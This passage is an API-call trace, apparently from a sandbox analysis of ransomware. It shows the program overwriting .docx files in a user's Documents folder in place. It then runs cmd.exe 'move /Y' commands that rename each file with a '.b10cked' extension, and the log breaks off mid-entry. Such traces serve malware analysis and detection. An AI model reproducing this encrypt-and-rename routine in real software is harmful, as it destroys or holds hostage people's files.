0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14525 [0135.045] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14a0d [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14a0d [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.047] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa505, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa505, lpOverlapped=0x0) returned 1 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.047] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa505, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa505, lpOverlapped=0x0) returned 1 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42245, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa508 [0135.047] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa505, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa505, lpOverlapped=0x0) returned 1 [0135.048] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42245, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa508 [0135.048] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa505, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa505, lpOverlapped=0x0) returned 1 [0135.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ERN4JQpRpgZde9N.docx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0135.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ERN4JQpRpgZde9N.docx", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERN4JQpRpgZde9N.docx", lpUsedDefaultChar=0x0) returned 20 [0135.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14a0d [0135.052] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.052] CloseHandle (hObject=0x114) returned 1 [0135.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\ERN4JQpRpgZde9N.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC") returned 0x26 [0135.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.054] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc5c, dwThreadId=0xc60)) returned 1 [0135.113] CloseHandle (hObject=0x110) returned 1 [0135.113] CloseHandle (hObject=0x114) returned 1 [0135.113] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.113] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.113] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\documents\\m9mmopgceujdvtgeeh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19190251473) returned 1 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xca08 [0135.115] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcef0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcef0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.116] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6777, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6777, lpOverlapped=0x0) returned 1 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.116] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6777, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6777, lpOverlapped=0x0) returned 1 [0135.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6779 [0135.117] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6777, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6777, lpOverlapped=0x0) returned 1 [0135.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6779 [0135.117] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6777, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6777, lpOverlapped=0x0) returned 1 [0135.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M9MmOpgceUJDVTGEEh.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M9MmOpgceUJDVTGEEh.docx", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M9MmOpgceUJDVTGEEh.docx", lpUsedDefaultChar=0x0) returned 23 [0135.122] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcef0 [0135.122] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.122] CloseHandle (hObject=0x114) returned 1 [0135.123] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\M9MmOpgceUJDVTGEEh.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC") returned 0x26 [0135.124] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.124] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc38, dwThreadId=0xbec)) returned 1 [0135.131] CloseHandle (hObject=0x110) returned 1 [0135.131] CloseHandle (hObject=0x114) returned 1 [0135.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.131] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\documents\\qxdehmzn lrwsqhutj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 